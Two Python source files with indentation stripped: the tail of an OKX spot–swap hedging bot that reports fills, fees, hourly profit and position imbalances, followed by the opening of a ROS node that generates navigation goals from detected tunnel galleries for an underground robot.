Operation_info[h]['spot_pending_list_left'] = 'off'
# print('h12321',h)
# print('swap_pending_list_left_final',Operation_info[h]['swap_pending_list_left'])
# print('spot_pending_list_left_final',Operation_info[h]['spot_pending_list_left'])
# print('swap_depth5_12',Operation_info[h]['swap_depth5'])
# refresh the latest swap 5-level depth
Operation_info[h]['swap_bids_price5'] = []
Operation_info[h]['swap_asks_price5'] = []
for i in range(5):
Operation_info[h]['swap_bids_price5'].append(float(Operation_info[h]['swap_depth5'][0]['bids'][i][0]))
Operation_info[h]['swap_asks_price5'].append(float(Operation_info[h]['swap_depth5'][0]['asks'][i][0]))
# refresh the latest spot 5-level depth
Operation_info[h]['spot_bids_price5'] = []
Operation_info[h]['spot_asks_price5'] = []
for i in range(5):
Operation_info[h]['spot_bids_price5'].append(float(Operation_info[h]['spot_depth5'][0]['bids'][i][0]))
Operation_info[h]['spot_asks_price5'].append(float(Operation_info[h]['spot_depth5'][0]['asks'][i][0]))
Nowtime = datetime.now()
new_record_second = Nowtime.second
new_record_minute = Nowtime.minute
new_record_hour = Nowtime.hour
new_record_day = Nowtime.day
timestamp = datetime.now().isoformat(" ", "seconds")
#new_record_hour != record_hour:
if new_record_hour < 8:
if new_record_minute <59:
if new_record_second > 30:
amount_spot_info=[]
amount_swap_info=[]
pair_info=[]
# get_fills_result = tradeAPI.get_fills(limit=100)
for h in TradingPair:
# first look up the spot fill records
spot_fills_result = tradeAPI.get_fills(instId=h)
time.sleep(0.1)
for i in spot_fills_result['data']:
# first accumulate the trading fee
Operation_info[h]['spot_trading_fee']=Operation_info[h]['spot_trading_fee']+float(i['fee'])*float(i['fillPx']) # spot rebates/fees are denominated in the traded coin, so convert them to USDT
timestamp=int(int(i['ts'])/1000)
# convert to local time
time_local = time.localtime(timestamp)
# reformat as a datetime string (e.g. 2016-05-05 20:28:54)
dt = time.strftime("%Y-%m-%d %H:%M:%S", time_local)
ddt = parse(dt)
# keep only fills from the wanted date
if ddt.day== new_record_day-1:
if i['side']=='sell':
Operation_info[h]['spot_sell_trading_net_amount']=Operation_info[h]['spot_sell_trading_net_amount']+float(i['fillSz'])*float(i['fillPx'])
Operation_info[h]['spot_trading_sell_size']=Operation_info[h]['spot_trading_sell_size']+float(i['fillSz'])
elif i['side']=='buy':
Operation_info[h]['spot_buy_trading_net_amount']=Operation_info[h]['spot_buy_trading_net_amount']+float(i['fillSz'])*float(i['fillPx'])
Operation_info[h]['spot_trading_buy_size']=Operation_info[h]['spot_trading_buy_size']+float(i['fillSz'])
# swap fill records
swap_instrument_id=h+'-SWAP'
swap_fills_result = tradeAPI.get_fills(instId= swap_instrument_id)
time.sleep(0.1)
for i in swap_fills_result['data']:
# first accumulate the trading fee
Operation_info[h]['swap_trading_fee']=Operation_info[h]['swap_trading_fee']+float(i['fee']) # USDT-margined swap rebates/fees are already in USDT, use them directly
timestamp=int(int(i['ts'])/1000)
# convert to local time
time_local = time.localtime(timestamp)
# reformat as a datetime string (e.g. 2016-05-05 20:28:54)
dt = time.strftime("%Y-%m-%d %H:%M:%S", time_local)
ddt = parse(dt)
# keep only fills from the wanted date
if ddt.day== new_record_day-1:
if i['side']=='sell':
Operation_info[h]['swap_sell_trading_net_amount']=Operation_info[h]['swap_sell_trading_net_amount']+float(i['fillSz'])*float(i['fillPx'])*Necessary_info[h]['contract_val']
Operation_info[h]['swap_trading_sell_size']=Operation_info[h]['swap_trading_sell_size']+float(i['fillSz'])*Necessary_info[h]['contract_val']
elif i['side']=='buy':
Operation_info[h]['swap_buy_trading_net_amount']=Operation_info[h]['swap_buy_trading_net_amount']+float(i['fillSz'])*float(i['fillPx'])*Necessary_info[h]['contract_val']
Operation_info[h]['swap_trading_buy_size']=Operation_info[h]['swap_trading_buy_size']+float(i['fillSz'])*Necessary_info[h]['contract_val']
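# Fee handling note: spot fills report the fee/rebate in the traded coin, so the spot loop above
# multiplies by fillPx to express it in USDT, while USDT-margined swap fills already report the
# fee in USDT. Hypothetical example: a spot rebate of 0.002 coin filled at 25 USDT adds 0.05 USDT,
# whereas a swap fee of -0.03 is accumulated as -0.03 USDT directly.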
# compute the net traded size
average_spot_trading_size=precfloat((Operation_info[h]['spot_trading_sell_size']-Operation_info[h]['spot_trading_buy_size']),2)
average_swap_trading_size=precfloat((Operation_info[h]['swap_trading_sell_size']-Operation_info[h]['swap_trading_buy_size']),2)
if precfloat(Operation_info[h]['spot_trading_buy_size'],2) == 0 :
spot_buy_average_price = 0
else:
spot_buy_average_price = precfloat(Operation_info[h]['spot_buy_trading_net_amount']/Operation_info[h]['spot_trading_buy_size'],2)
if precfloat(Operation_info[h]['spot_trading_sell_size'],2) == 0 :
spot_sell_average_price = 0
else:
spot_sell_average_price = precfloat(Operation_info[h]['spot_sell_trading_net_amount']/Operation_info[h]['spot_trading_sell_size'],2)
if precfloat(Operation_info[h]['swap_trading_buy_size'],2) == 0 :
swap_buy_average_price = 0
else:
swap_buy_average_price = precfloat(Operation_info[h]['swap_buy_trading_net_amount']/Operation_info[h]['swap_trading_buy_size'],2)
if precfloat(Operation_info[h]['swap_trading_sell_size'],2) == 0 :
swap_sell_average_price = 0
else:
swap_sell_average_price = precfloat(Operation_info[h]['swap_sell_trading_net_amount']/Operation_info[h]['swap_trading_sell_size'],2)
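# Note: each average price above uses the same guard -- if the accumulated size rounds to 0 the
# average is reported as 0 instead of dividing by zero. A compact sketch of the idea
# (hypothetical helper, not used by this script):
#     def safe_avg(amount, size):
#         return precfloat(amount / size, 2) if precfloat(size, 2) else 0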
key_list = []
value_list = []
key_list = ["现货买入成交额(USD)", "现货买入成交量(币)", "现货买入平均价格(USD)","现货卖出成交额(USD)", "现货卖出成交量(币)", "现货卖出平均价格(USD)",'现货交易累积手续费(USD)']
value_list = [str(precfloat(Operation_info[h]['spot_buy_trading_net_amount'],2)),str(precfloat(Operation_info[h]['spot_trading_buy_size'],2)),str(spot_buy_average_price),str(precfloat(Operation_info[h]['spot_sell_trading_net_amount'],2)),str(precfloat(Operation_info[h]['spot_trading_sell_size'],2)),str(spot_sell_average_price),str(precfloat(Operation_info[h]['spot_trading_fee'],5))]
amount_spot_pair_info = dict(zip(key_list, value_list))
B={h:amount_spot_pair_info}
amount_spot_info.append(B)
key_list = []
value_list = []
key_list = ["U本位合约买入成交额(USD)", "U本位合约买入成交量(币)", "U本位合约买入平均价格(USD)","U本位合约卖出成交额(USD)", "U本位合约卖出成交量(币)", "U本位合约卖出平均价格(USD)", "U本位合约交易累积手续费(USD)"]
value_list = [str(precfloat(Operation_info[h]['swap_buy_trading_net_amount'],2)),str(precfloat(Operation_info[h]['swap_trading_buy_size'],2)),str(swap_buy_average_price),str(precfloat(Operation_info[h]['swap_sell_trading_net_amount'],2)),str(precfloat(Operation_info[h]['swap_trading_sell_size'],2)),str(swap_sell_average_price),str(precfloat(Operation_info[h]['swap_trading_fee'],5))]
amount_swap_pair_info = dict(zip(key_list, value_list))
C={h:amount_swap_pair_info}
amount_swap_info.append(C)
#tutu = timestamp + "," + '交易对 '+ h +':'+'现货买进'+str(Operation_info[h]['spot_buy_trading_orders'])+'次,'+ '现货卖出'+str(Operation_info[h]['spot_sell_trading_orders'])+'次,'+'U本永续买进'+str(Operation_info[h]['swap_buy_trading_orders'])+'次,'+'U本永续卖出'+str(Operation_info[h]['swap_sell_trading_orders'])+'次。'
key_list = []
value_list = []
key_list = ["现货下单买进(非成交)", "现货下单卖出(非成交)", "U本永续下单买进(非成交)", "U本永续下单卖出(非成交)"]
value_list = [str(Operation_info[h]['spot_buy_trading_orders'])+'次', str(Operation_info[h]['spot_sell_trading_orders'])+'次',str(Operation_info[h]['swap_buy_trading_orders'])+'次',str(Operation_info[h]['swap_sell_trading_orders'])+'次']
pair_order_info = dict(zip(key_list, value_list))
A={h:pair_order_info}
pair_info.append(A)
tutu_1=amount_spot_info
sendmessage(tutu_1)
tutu_2=pair_info
sendmessage(tutu_2)
tutu_3=amount_swap_info
sendmessage(tutu_3)
# Operation_info[h]['swap_sell_trading_orders']
# Operation_info[h]['swap_buy_trading_orders']
# Operation_info[h]['spot_sell_trading_orders']
# Operation_info[h]['spot_buy_trading_orders']
time.sleep(30)
except (asyncio.TimeoutError, websockets.exceptions.ConnectionClosed) as e:
try:
await ws.send('ping')
res = await ws.recv()
print(res)
continue
except Exception as e:
print(e)
print("disconnected,connecting tradeA……")
# error存成csv
mapping = {}
kk = []
path = '/root/' + Customer_name + '_error_report.csv'
key_list = ['timestamp', 'error']
for key, value in zip(key_list, [datetime.now(), e]):
mapping[key] = value
kk.append(dict(mapping))  # copy the record; json.dumps would fail on the datetime/exception values, so avoid eval(json.dumps(...))
kkk = pd.DataFrame(kk)
# kkk.to_csv(path, mode='a+', header=True, index=False)
break
except Exception as e:
print(e)
print("disconnected,connecting tradeB……")
# error存成csv
mapping = {}
kk = []
path = '/root/' + Customer_name + '_error_report.csv'
key_list = ['timestamp', 'error']
for key, value in zip(key_list, [datetime.now(), e]):
mapping[key] = value
kk.append(dict(mapping))  # copy the record; json.dumps would fail on the datetime/exception values, so avoid eval(json.dumps(...))
kkk = pd.DataFrame(kk)
# kkk.to_csv(path, mode='a+', header=True, index=False)
continue
# unsubscribe channels
async def unsubscribe(url, api_key, passphrase, secret_key, channels):
async with websockets.connect(url) as ws:
# login
timestamp = str(get_local_timestamp())
login_str = login_params(timestamp, api_key, passphrase, secret_key)
await ws.send(login_str)
# print(f"send: {login_str}")
res = await ws.recv()
print(f"recv: {res}")
# unsubscribe
sub_param = {"op": "unsubscribe", "args": channels}
sub_str = json.dumps(sub_param)
await ws.send(sub_str)
print(f"send: {sub_str}")
res = await ws.recv()
print(f"recv: {res}")
# unsubscribe channels
async def unsubscribe_without_login(url, channels):
async with websockets.connect(url) as ws:
# unsubscribe
sub_param = {"op": "unsubscribe", "args": channels}
sub_str = json.dumps(sub_param)
await ws.send(sub_str)
print(f"send: {sub_str}")
res = await ws.recv()
print(f"recv: {res}")
def run_ws(api_key,secret_key,passphrase, channels,TT,MQ,AQ,TradingPair,param_set_list):
# pd.set_option('display.max_columns', None) # 显示完整的列
# pd.set_option('display.max_rows', None) # 显示完整的行
# pd.set_option('display.expand_frame_repr', False) # 设置不折叠数据
flag = '0'
# WebSocket public channel
# production endpoint
url_public = "wss://ws.okex.com:8443/ws/v5/public"
# production endpoint
url_private = "wss://ws.okex.com:8443/ws/v5/private"
loop = asyncio.get_event_loop()
# public channels, no login required (tickers, open interest, candlesticks, mark price, depth, funding rate, etc.)
if TT=="public":
loop.run_until_complete(subscribe_without_login(url_public, channels,MQ,TradingPair))
# private channels, login required (account, positions, orders, etc.)
if TT=="private":
loop.run_until_complete(subscribe(url_private, api_key, passphrase, secret_key, channels,AQ,TradingPair))
# trading (place, cancel, amend orders, etc.)
if TT== "trade":
loop.run_until_complete(trade(url_private, api_key, passphrase, secret_key, MQ,AQ,TradingPair,param_set_list))
loop.close()
if __name__=='__main__':
#necessary factors for restAPI
#flag = '1'
#
api_key = ""
secret_key = ""
passphrase = ""
flag = '0'
publicAPI = Public.PublicAPI(api_key, secret_key, passphrase, False, flag)
tradeAPI = Trade.TradeAPI(api_key, secret_key, passphrase, False, flag)
accountAPI = Account.AccountAPI(api_key, secret_key, passphrase, False, flag)
marketAPI = Market.MarketAPI(api_key, secret_key, passphrase, False, flag)
TradingPair ={}
Customer_name=''
total_balance_hour = precfloat(accountAPI.get_account()['data'][0]['totalEq'], 3) # this is in USDT
#total_balance = precfloat(accountAPI.get_account()['data'][0]['totalEq'], 3)
# initial variable setup
MarketQ = {}
for i in TradingPair:
MarketQ[i] = {"DEPTH5_SWAP": "", "DEPTH5_SPOT":"", "PRESENT_FUNDING": "","PREDICT_FUNDING":"","P_INFO_SWAP":'',"P_INFO_SPOT":'','INDEX_TICKERS_SPOT':'','INDEX_TICKERS_SWAP':'','MARK_PRICE_SWAP':''}
for j in MarketQ[i]:
MarketQ[i][j] = Queue()
AccountQ = {}
for i in TradingPair:
AccountQ[i] = {"POSITION_SWAP": "", "POSITION_SPOT": "","POSITION_MARGIN": "",'ORDERS_SWAP':"",'ORDERS_SPOT':"",'ORDERS_MARGIN':""}
for j in AccountQ[i]:
AccountQ[i][j] = Queue()
#funding rate
Nowtime = datetime.now()
record_minute = Nowtime.minute
record_hour = Nowtime.hour
Necessary_info = {}
Operation_info = {}
for i in TradingPair:
Necessary_info[i] = {}
Operation_info[i] = {}
for i in TradingPair:
time.sleep(1)
instId_fu, Present_Funding_Rate,Predict_Funding_Rate = funding_recalculate(i+'-SWAP')
instr_fu = instId_fu.split('-') # split the instrument_id to rebuild the pair name
TP = instr_fu[0] + "-" + instr_fu[1]
if len(instr_fu)==3: #only swap gets funding rate, so 3
if MarketQ[TP]["PRESENT_FUNDING"].empty() == True:
MarketQ[TP]["PRESENT_FUNDING"].put(Present_Funding_Rate)
elif MarketQ[TP]["PRESENT_FUNDING"].empty() == False:
MarketQ[TP]["PRESENT_FUNDING"].get()
MarketQ[TP]["PRESENT_FUNDING"].put(Present_Funding_Rate)
swap_info = publicAPI.get_instruments('SWAP')['data']
time.sleep(0.2)
# print(swap_info)
for j in swap_info:
if j['instId'] == i + '-SWAP': # need to notice here's insId (SWAP)
Necessary_info[i]['swap_tick_size'] = float(j["tickSz"])
Necessary_info[i]['swap_tick_digit'] = np.log10(1 / float(j["tickSz"]))
Necessary_info[i]['contract_val'] = float(j['ctVal'])
Necessary_info[i]['swap_min_size'] = float(j['minSz'])
spot_info = publicAPI.get_instruments('SPOT')['data']
time.sleep(0.2)
for j in spot_info:
if j['instId'] == i : # need to notice here's insId (SWAP)
Necessary_info[i]['spot_tick_size'] = float(j["tickSz"])
Necessary_info[i]['spot_tick_digit'] = np.log10(1 / float(j["tickSz"]))
Necessary_info[i]['spot_min_size'] = float(j['minSz'])
param_set_list = {'maker_commission_spot':-0.00005,
'taker_commission_spot':0.0002,
'maker_commission_swap':-0.00001,
"taker_commission_swap":0.00022,
'tolerate_limit':1300,
'order_limit':500, # size placed per opening order
'close_short_index' : 2 # multiple of the opening size used when closing
}
channel_private = [{"channel": "positions", "instType": "MARGIN"},
{"channel": "positions", "instType": "SWAP"},
{"channel": "orders", "instType": "SPOT"},
{"channel": "orders", "instType": "MARGIN"},
{"channel": "orders", "instType": "SWAP"},
{"channel": "account"}
]
channel_public = []
for h in TradingPair:
spot_instrument_id = h
swap_instrument_id = h + '-SWAP'
# subscribe to the spot index ticker
key_list = []
value_list = []
key_list = ["channel", "instId"]
value_list = ["index-tickers", spot_instrument_id]
spot_order_param = dict(zip(key_list, value_list))
channel_public.append(spot_order_param)
# subscribe to the spot 5-level depth
key_list = []
value_list = []
key_list = ["channel", "instId"]
value_list = ["books5", spot_instrument_id]
spot_order_param = dict(zip(key_list, value_list))
channel_public.append(spot_order_param)
# subscribe to the swap 5-level depth
key_list = []
value_list = []
key_list = ["channel", "instId"]
value_list = ["books5", swap_instrument_id]
swap_order_param = dict(zip(key_list, value_list))
channel_public.append(swap_order_param)
# subscribe to the swap funding rate
key_list = []
value_list = []
key_list = ["channel", "instId"]
value_list = ["funding-rate", swap_instrument_id]
swap_order_param = dict(zip(key_list, value_list))
channel_public.append(swap_order_param)
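# For reference, the loop above builds OKX v5 subscription entries; for a hypothetical pair
# "BTC-USDT" it appends:
#     {"channel": "index-tickers", "instId": "BTC-USDT"}
#     {"channel": "books5", "instId": "BTC-USDT"}
#     {"channel": "books5", "instId": "BTC-USDT-SWAP"}
#     {"channel": "funding-rate", "instId": "BTC-USDT-SWAP"}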
channel_trade=[]
ws1 = Process( target=run_ws, args=(api_key,secret_key,passphrase, channel_private,"private",MarketQ,AccountQ,TradingPair,param_set_list))
ws2 = Process( target=run_ws, args=(api_key,secret_key,passphrase, channel_public,"public",MarketQ,AccountQ,TradingPair,param_set_list))
wst = Process( target=run_ws, args=(api_key,secret_key,passphrase, channel_trade,"trade",MarketQ,AccountQ,TradingPair,param_set_list))
ws1.start()
ws2.start()
wst.start()
while True:
# time.sleep(1)
try:
Nowtime = datetime.now()
new_record_second = Nowtime.second
new_record_minute = Nowtime.minute
new_record_hour = Nowtime.hour
for i in TradingPair:
Operation_info[i]['spot_bids_price5_forc'] = []
Operation_info[i]['spot_asks_price5_forc'] = []
try:
Operation_info[i]['spot_depth5'] = MarketQ[i]["DEPTH5_SPOT"].get(timeout=1)
except:
try:
Operation_info[i]['spot_depth5'] = Operation_info[i]['spot_depth5']
except:
Operation_info[i]['spot_depth5'] = marketAPI.get_orderbook(i , '5')['data']
print('spot_depth5 fetched via REST API fallback __9')
time.sleep(0.1)
for j in range(5):
Operation_info[i]['spot_bids_price5_forc'].append(float(Operation_info[i]['spot_depth5'][0]['bids'][j][0]))
Operation_info[i]['spot_asks_price5_forc'].append(float(Operation_info[i]['spot_depth5'][0]['asks'][j][0]))
new_spot_bid=float(Operation_info[i]['spot_bids_price5_forc'][0])
new_spot_ask=float(Operation_info[i]['spot_asks_price5_forc'][0])
spot_present_price = precfloat((new_spot_ask + new_spot_bid)/2,Necessary_info[i]['swap_tick_digit'])
instr_fu = i.split('-')
spot_currency=instr_fu[0]
try:
swap_dic = AccountQ[i]["POSITION_SWAP"].get(timeout=1)
Necessary_info[i]['swap_position_result'] = float(swap_dic['pos'])
if Necessary_info[i]['swap_position_result'] ==0:
Necessary_info[i]['swap_position_result'] = float(accountAPI.get_positions(instId=i+'-SWAP')['data'][0]['pos'])
time.sleep(0.2)
# Operation_info[i]['swap_position'] = float(swap_dic['pos'])
# except:
# total_swap_dic = accountAPI.get_positions('SWAP')['data']
except:
try:
Necessary_info[i]['swap_position_result'] = float(accountAPI.get_positions(instId=i+'-SWAP')['data'][0]['pos'])
time.sleep(0.2)
except:
Necessary_info[i]['swap_position_result'] = 0
try:
spot_dic = AccountQ[i]["POSITION_SPOT"].get(timeout=1)
# print('spot_dic_1',spot_dic)
Necessary_info[i]['spot_balance_result'] = float(spot_dic['cashBal'])
if Necessary_info[i]['spot_balance_result'] ==0:
Necessary_info[i]['spot_balance_result'] = float(accountAPI.get_account(instr_fu[0])['data'][0]['details'][0]['cashBal'])
time.sleep(0.5)
except:
total_spot_dic = accountAPI.get_account()['data'][0]['details']
time.sleep(0.5)
spot_cc_list=[]
if len(total_spot_dic)!=0:
for j in total_spot_dic:
TP=j['ccy']+'-USDT'
spot_cc_list.append(TP)
if i in spot_cc_list:
instr_fu = i.split('-')
for j in total_spot_dic:
if j['ccy']==instr_fu[0]:
Necessary_info[i]['spot_dic'] = j
spot_dic = Necessary_info[i]['spot_dic']
Necessary_info[i]['spot_balance_result'] = float(spot_dic['cashBal'])
else:
Necessary_info[i]['spot_balance_result']=0
else:
Necessary_info[i]['spot_balance_result']=0
compare_cal=Necessary_info[i]['swap_position_result']*Necessary_info[i]['contract_val']+Necessary_info[i]['spot_balance_result']
# spot and swap legs carry opposite signs, so the imbalance is their sum
if Necessary_info[i]['spot_balance_result'] >0: # positive (long-spot) position
if compare_cal*spot_present_price>500:
tutu=timestamp +','+i+'开正仓,现货比永续多'+ str(precfloat(abs(compare_cal*spot_present_price),3))+'美金'
sendmessage(tutu)
time.sleep(3)
elif compare_cal*spot_present_price<-500:
tutu=timestamp +','+i+'开正仓,永续比现货多'+ str(precfloat(abs(compare_cal*spot_present_price),3))+'美金'
sendmessage(tutu)
time.sleep(3)
elif Necessary_info[i]['spot_balance_result'] <0: # negative (short-spot) position
if compare_cal*spot_present_price>500:
tutu=timestamp +','+i+'开负仓,永续比现货多'+ str(precfloat(abs(compare_cal*spot_present_price),3))+'美金'
sendmessage(tutu)
time.sleep(3)
elif compare_cal*spot_present_price<-500:
tutu=timestamp +','+i+'开负仓,现货比永续多'+ str(precfloat(abs(compare_cal*spot_present_price),3))+'美金'
sendmessage(tutu)
time.sleep(3)
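# Imbalance check note: compare_cal = swap_position*contract_val + spot_balance measures the
# unhedged residual in coins. Hypothetical example: spot_balance = +1000, swap_position = -9990
# contracts with contract_val 0.1 -> compare_cal = +1 coin; at a price of 600 USDT that is a
# 600 USD gap, which exceeds the 500 USD threshold and triggers the alert message above.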
if new_record_hour != record_hour:
# parent account (USDT-margined): total equity in USDT
account_asset = precfloat(accountAPI.get_account()['data'][0]['totalEq'], 3)
timestamp = datetime.now().isoformat(" ", "seconds")
# convert to ETH
result = marketAPI.get_ticker('ETH-USDT')
eth_price = (float(result['data'][0]['askPx']) + float(result['data'][0]['bidPx'])) / 2
new_total_balance_hour = account_asset
new_total_balance_hour_eth = account_asset/eth_price
hour_profit = precfloat(new_total_balance_hour - total_balance_hour, 2)
hour_profit_eth = hour_profit/eth_price
hour_profit_percent = precfloat(hour_profit / total_balance_hour * 100, 2)
tutu = timestamp + ",目前总资产为" + str(precfloat(new_total_balance_hour,2)) + 'USDT,等于'+str(precfloat(new_total_balance_hour_eth,2))+'个eth'
sendmessage(tutu)
tutu = timestamp + ",每小时获利为" + str(precfloat(hour_profit,2)) + 'USDT,等于'+str(precfloat(hour_profit_eth,2))+'个eth'
sendmessage(tutu)
tutu = timestamp + ",每小时获利率为" + str(precfloat(hour_profit_percent,2)) + '%'
sendmessage(tutu)
record_hour = new_record_hour
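# Hourly PnL note: hour_profit_percent = hour_profit / total_balance_hour * 100. Hypothetical
# example: equity moving from 10000 to 10050 USDT gives hour_profit = 50 USDT and a 0.5% hourly
# return; the ETH-equivalent figures simply divide by the current ETH mid price.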
if new_record_hour == 9 :
if new_record_minute == 0:
new_total_balance_day = account_asset
day_profit = precfloat(new_total_balance_day - total_balance_day, 2)
day_profit_eth = day_profit/eth_price
day_profit_percent = precfloat(day_profit / total_balance_day * 100, 2)
tutu = timestamp + ",每日获利为" + str(precfloat(day_profit,2)) + 'USDT,等于'+str(precfloat(day_profit_eth,2))+'个eth'
sendmessage(tutu)
tutu = timestamp + ",每日获利率为" + str(precfloat(day_profit_percent,2)) + '%'
sendmessage(tutu)
mapping = {}
kk = []
path = '/root/' + Customer_name + '_profit_report.csv'
key_list = ['timestamp', '单日获利(usdt)', '单日获利率(%)', '总资产净值(usdt)']
for key, value in zip(key_list, [timestamp, day_profit, day_profit_percent, new_total_balance_day]):
mapping[key] = value
kk.append(eval(json.dumps(mapping)))
kkk = pd.DataFrame(kk)
# kkk.to_csv(path, mode='a+', header=True, index=False)
total_balance_day = new_total_balance_day
time.sleep(60)
time.sleep(5)
# system restart
# tutu = timestamp + ",机器人重启"
# sendmessage(tutu)
# restart the bot every half hour
# if new_record_minute == 30:
# if new_record_second > 55:
# ws1.terminate()
# ws2.terminate()
# wst.terminate()
# restart_program()
# record_hour = new_record_hour #这行可能没用
# if new_record_hour == 9:
# if new_record_minute == 3:
# 母帐户U本位
# account_asset = precfloat(accountAPI.get_account()['data'][0]['totalEq'], 3)
# timestamp = datetime.now().isoformat(" ", "seconds")
# 换算成eth
# result = marketAPI.get_ticker('ETH-USDT')
# eth_price = (float(result['data'][0]['askPx']) + float(result['data'][0]['bidPx'])) / 2
# new_total_balance = account_asset/eth_price
# day_profit = precfloat(new_total_balance - total_balance, 2)
# day_profit_percent = precfloat(day_profit / total_balance * 100, 2)
# tutu = timestamp + ",目前总资产为" + str(new_total_balance) + '个eth'
# sendmessage_to_customer(tutu)
# tutu = timestamp + ",单日获利为" + str(day_profit) + '个eth'
# sendmessage_to_customer(tutu)
# tutu = timestamp + ",单日获利率为" + str(day_profit_percent) + '%'
# sendmessage_to_customer(tutu)
# total_balance = new_total_balance
# mapping = {}
# kk = []
# path = '/root/' + Customer_name + '_profit_report.csv'
# key_list = ['timestamp', '单日获利(eth)', '单日获利率(%)', '总资产净值(eth)']
# for key, value in zip(key_list, [timestamp, day_profit, day_profit_percent, total_balance]):
# mapping[key] = value
# kk.append(eval(json.dumps(mapping)))
# kkk = pd.DataFrame(kk)
# kkk.to_csv(path, mode='a+', header=True, index=False)
# time.sleep(60)
# if new_record_minute % 10 ==0 :
# print(Nowtime)
# time.sleep(60)
if new_record_minute % 20 ==0 :
timestamp = datetime.now().isoformat(" ", "seconds")
tutu = timestamp + Customer_name+"机器人还活著"
# sendmessage(tutu)
time.sleep(61)
#record_minute = new_record_minute
# recompute the historical funding rate every eight hours
if Nowtime.hour == 8 or Nowtime.hour == 16 or Nowtime.hour == 0:
if Nowtime.minute == 1:
for i in TradingPair:
instId_fu, Present_Funding_Rate,Predict_Funding_Rate = funding_recalculate(i+'-SWAP')
instr_fu = instId_fu.split('-')
TP = instr_fu[0] + "-" + instr_fu[1]
if len(instr_fu) == 3: # only swap gets funding rate, so 3
if MarketQ[TP]["PRESENT_FUNDING"].empty() == True:
MarketQ[TP]["PRESENT_FUNDING"].put(Present_Funding_Rate)
elif MarketQ[TP]["PRESENT_FUNDING"].empty() == False:
MarketQ[TP]["PRESENT_FUNDING"].get()
MarketQ[TP]["PRESENT_FUNDING"].put(Present_Funding_Rate)
except:
pass
# ws1.join()
# ws2.join()
# wst.join()
|
goal_generation_node.py
|
#!/bin/python3
from math import sqrt
import time
import rospy
import std_msgs.msg as ros_std_msg
import geometry_msgs.msg as ros_geom_msg
from threading import Thread
import numpy as np
from datetime import datetime
import tf
import actionlib
import move_base_msgs.msg as ros_mb_msg
import gazebo_msgs.srv as ros_gz_srv
import copy
# --------------------
# GENERAL NOTES
# - In this script, a semantic navigation system is implemented for a robot in
# an underground environment. The expected inputs for this node are:
# - /gallery_angles: These are obtained by a different node. List of
# angles wrt the robot in which direction a gallery is found. This also
# includes the current gallery aka, the front and the back.
# - /tile_type: This topic should continually publish whether the robot is
# in an intersection, a rect, a curve etc...
#
#
# --------------------
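# Quick manual test (a sketch, assuming the topic names and message types used by the
# subscribers below): the node's inputs can be exercised from the command line, e.g.
#     rostopic pub /environment_label std_msgs/String "data: 'block'"
#     rostopic pub /gallery_detection_vector std_msgs/Float32MultiArray "data: [...]"   # 360 values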
def euler_to_quaternion(yaw, pitch, roll):
qx = np.sin(roll/2) * np.cos(pitch/2) * np.cos(yaw/2) - \
np.cos(roll/2) * np.sin(pitch/2) * np.sin(yaw/2)
qy = np.cos(roll/2) * np.sin(pitch/2) * np.cos(yaw/2) + \
np.sin(roll/2) * np.cos(pitch/2) * np.sin(yaw/2)
qz = np.cos(roll/2) * np.cos(pitch/2) * np.sin(yaw/2) - \
np.sin(roll/2) * np.sin(pitch/2) * np.cos(yaw/2)
qw = np.cos(roll/2) * np.cos(pitch/2) * np.cos(yaw/2) + \
np.sin(roll/2) * np.sin(pitch/2) * np.sin(yaw/2)
return [qx, qy, qz, qw]
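# Worked example (sanity check): euler_to_quaternion(np.pi/2, 0, 0) returns approximately
# [0, 0, 0.7071, 0.7071], i.e. a pure 90-degree rotation about z, which is the [qx, qy, qz, qw]
# convention goal_from_angle() below relies on when orienting goals.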
class Nodo:
"""La clase nodo está pensada para almacenar
los distintos nodos del mapa, así como las
relaciones entre las diferentes galerías que
a las que está conectado."""
def __init__(self, map, n_galleries):
self.n_galleries = n_galleries
class Galeria:
def __init__(self, map):
# A gallery can only connect two nodes
self.map = map
self.nodes = [None, None]
class Mapa:
"""La clase mapa está pensada para almacenar
una serie de nodos conectados por galerías,
y conservar las relaciones entre estos nodos"""
def __init__(self) -> None:
self.nodes = list()
self.galleries = list()
class GoalGenerationNode:
def __init__(self, goal_time_interval=1, goal_distance=3):
self.n_instruction = 0
self.goal_time_interval = goal_time_interval
self.goal_distance = goal_distance
self.reset_quadrants()
self.time = datetime.now()
self.seq = 0
self.can_send_goal = True
rospy.init_node(self.__class__.__name__)
self.instructions = rospy.get_param("/instructions")
self.final_blocker_position_x = rospy.get_param(
"/final_blocker_position_x")
self.final_blocker_position_y = rospy.get_param(
"/final_blocker_position_y")
self.listener = tf.TransformListener()
self.tf_transformer = tf.TransformerROS()
self.tile_type_subscriber = rospy.Subscriber(
"/environment_label", ros_std_msg.String, callback=self.tile_type_callback)
self.gallery_subscriber = rospy.Subscriber(
"/gallery_detection_vector", ros_std_msg.Float32MultiArray, self.gallery_detection_callback)
self.move_base_client = actionlib.SimpleActionClient(
"move_base", ros_mb_msg.MoveBaseAction)
self.get_robot_pose_client = rospy.ServiceProxy(
"/gazebo/get_model_state", ros_gz_srv.GetModelState)
if not self.move_base_client.wait_for_server(rospy.Duration(5)):
rospy.logerr("THERE IS NO MOVE BASE NODE")
self.first_callback = False
while not self.first_callback:
rospy.sleep(0.5)
self.run_thread = Thread(target=self.run)
self.already_chosen_exit = False
self.run_thread.start()
self.run_thread.join()
def reset_quadrants(self):
self.quadrants = {"front": [],
"left": [],
"right": [],
"back": []
}
def tile_type_callback(self, msg: ros_std_msg.String):
self.tile_type = msg.data
def array_position_to_angle(self, array_position):
return 180 - array_position
def get_galleries_from_vector(self, vector):
self.vector = vector
self.filtered = np.zeros(360)
for i in range(360):
to_check = vector[i]
self.filtered[i] = to_check
for j in range(31):
subsection_index = ((-15 + j) + i) % 360  # wrap the +/-15 sample window around the 360-sample vector
if vector[subsection_index] > to_check:
self.filtered[i] = 0
max_peak = np.max(self.filtered)
galleries_indices = np.nonzero(self.filtered > max_peak * 0.6)
galleries_angles = []
for index in galleries_indices:
galleries_angles.append(
self.array_position_to_angle(index)/180.0 * np.math.pi)
return np.array(galleries_angles)[0]
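# Note on the peak filter above: an element survives only if it is the maximum of the 31-sample
# window centred on it, peaks below 60% of the global maximum are discarded, and the remaining
# indices are converted to angles in radians via array_position_to_angle (index 180 maps to
# 0 rad, i.e. straight ahead under this node's convention).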
def gallery_detection_callback(self, msg: ros_std_msg.Float32MultiArray):
""" This function should take the input from the neural network, and
translate it to quadrants"""
data = np.array(msg.data)
angles_of_galleries = self.get_galleries_from_vector(data)
quadrants = {"front": [],
"left": [],
"right": [],
"back": []
}
for angle in angles_of_galleries:
if angle > -np.math.pi/4 and angle < np.math.pi/4:
quadrants["front"].append(angle)
